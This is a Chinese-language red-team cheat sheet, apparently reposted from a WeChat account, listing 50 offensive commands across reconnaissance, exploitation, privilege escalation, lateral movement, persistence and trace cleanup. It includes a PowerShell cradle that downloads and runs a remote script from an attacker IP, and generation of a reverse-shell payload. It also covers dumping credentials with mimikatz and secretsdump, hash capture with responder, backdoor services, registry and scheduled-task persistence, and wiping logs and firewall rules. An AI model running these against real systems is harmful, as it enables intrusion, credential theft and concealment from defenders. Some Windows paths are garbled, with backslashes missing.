在渗透测试与红队攻防中,熟练使用命令行工具是安全从业者的核心能力。本文整理了50个高频渗透攻防命令,覆盖信息收集、漏洞利用、权限提升、内网横向等核心场景,助你快速定位问题、提升实战效率。
一、信息收集与侦查
-
1.
nmap -sV -p 1-65535 <target>
-
• 全端口扫描+服务版本探测。
-
2.
masscan -p1-65535 <target> --rate=1000
-
• 高速端口扫描(需Root权限)。
-
3.
dig <domain> ANY
-
• 查询域名的DNS记录(含TXT/MX等)。
-
4.
whois <domain>
-
• 获取域名的注册信息。
-
5.
theHarvester -d <domain> -b google
-
• 搜索引擎关联信息搜集。
-
6.
subfinder -d <domain>
-
• 自动化子域名枚举。
-
7.
curl -I <url>
-
• 获取HTTP响应头(检查Server类型)。
-
8.
wafw00f <url>
-
• 检测目标是否部署WAF。
-
9.
smtp-user-enum -M VRFY -U users.txt -t <target>
-
• SMTP服务用户枚举。
-
10.
enum4linux -a <target>
-
• Samba/LDAP服务信息枚举。
二、漏洞探测与利用
-
11.
sqlmap -u "http://target.com/?id=1" --dbs
-
• 自动化SQL注入检测与数据库枚举。
-
12.
nikto -h <target>
-
• Web服务器漏洞扫描(常见配置缺陷)。
-
13.
gobuster dir -u <url> -w wordlist.txt
-
• 目录/文件暴力枚举。
-
14.
searchsploit <keyword>
-
• 本地Exploit-DB漏洞库搜索。
-
15.
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor"
-
• Metasploit模块快速调用。
-
16.
hydra -L users.txt -P passwords.txt ftp://<target>
-
• FTP暴力破解(支持多协议)。
-
17.
responder -I eth0
-
• LLMNR/NBT-NS毒化攻击(窃取哈希)。
-
18.
impacket-psexec <user>:<password>@<target>
-
• 通过SMB执行远程命令(Pass-the-Hash)。
-
19.
smbmap -H <target>
-
• SMB共享目录权限探测。
-
20.
crackmapexec smb <target> -u users.txt -p passwords.txt
-
• 内网SMB服务批量爆破。
三、权限提升与后渗透
-
21.
sudo -l
-
• 查看当前用户可用的sudo权限。
-
22.
find / -perm -4000 2>/dev/null
-
• 查找SUID权限文件(提权利用点)。
-
23.
linpeas.sh
-
• Linux本地提权自动化检测脚本。
-
24.
windows-exploit-suggester.py --update
-
• Windows补丁漏洞检测(比对systeminfo)。
-
25.
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
-
• 内存中提取明文密码(Windows)。
-
26.
procdump -ma <PID>
-
• 导出进程内存(配合Mimikatz分析)。
-
27.
net user /domain
-
• 查询域用户列表(Windows域环境)。
-
28.
secretsdump.py -hashes <hash> <domain>/<user>@<target>
-
• 导出域控哈希(Impacket工具链)。
-
29.
bloodhound-python -d <domain> -u <user> -p <password> -c All
-
• BloodHound数据采集(域环境分析)。
-
30.
chisel client <attacker_ip>:<port> R:socks
-
• 建立Socks5隧道穿透内网。
四、内网横向与持久化
-
31.
arp-scan -l
-
• 内网主机存活探测(ARP扫描)。
-
32.
ssh -D 1080 user@<target>
-
• 通过SSH建立动态端口转发。
-
33.
ping -n 1 <target>
-
• Windows主机存活检测(ICMP)。
-
34.
psexec.py <domain>/<user>:<password>@<target>
-
• 横向移动执行命令(Impacket)。
-
35.
evil-winrm -i <target> -u <user> -p <password>
-
• 通过WinRM远程连接Windows。
-
36.
sc.exe \<target> create backdoor binpath= "cmd.exe /k C:shell.exe"
-
• 创建远程服务(Windows横向)。
-
37.
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v backdoor /t REG_SZ /d "C:shell.exe"
-
• 注册表添加持久化启动项。
-
38.
schtasks /create /tn "backdoor" /tr "C:shell.exe" /sc hourly
-
• 计划任务持久化(Windows)。
-
39.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
-
• 生成木马载荷(Metasploit)。
-
40.
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')"
-
• 内存加载PowerShell脚本(免杀)。
五、痕迹清理与应急响应
-
41.
shred -zuv <file>
-
• 安全擦除文件(覆盖后删除)。
-
42.
history -c
-
• 清除当前Shell历史记录(Linux)。
-
43.
wevtutil cl security
-
• 清理Windows安全事件日志。
-
44.
rm -rf ~/.bash_history
-
• 删除Bash历史文件(Linux)。
-
45.
taskkill /F /PID <pid>
-
• 强制终止进程(Windows)。
-
46.
logreset.py -t <target> -u <user> -p <password>
-
• 远程日志清除(需权限)。
-
47.
clearev
-
• Metasploit会话中一键清除日志。
-
48.
find / -name "*.log" -exec rm {} ;
-
• 删除所有日志文件(谨慎使用)。
-
49.
iptables -F
-
• 清空防火墙规则(Linux)。
-
50.
netsh advfirewall reset
-
• 重置Windows防火墙配置。
原文始发于微信公众号(HACK之道):红队利器 | 50个高频渗透攻防命令速查
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论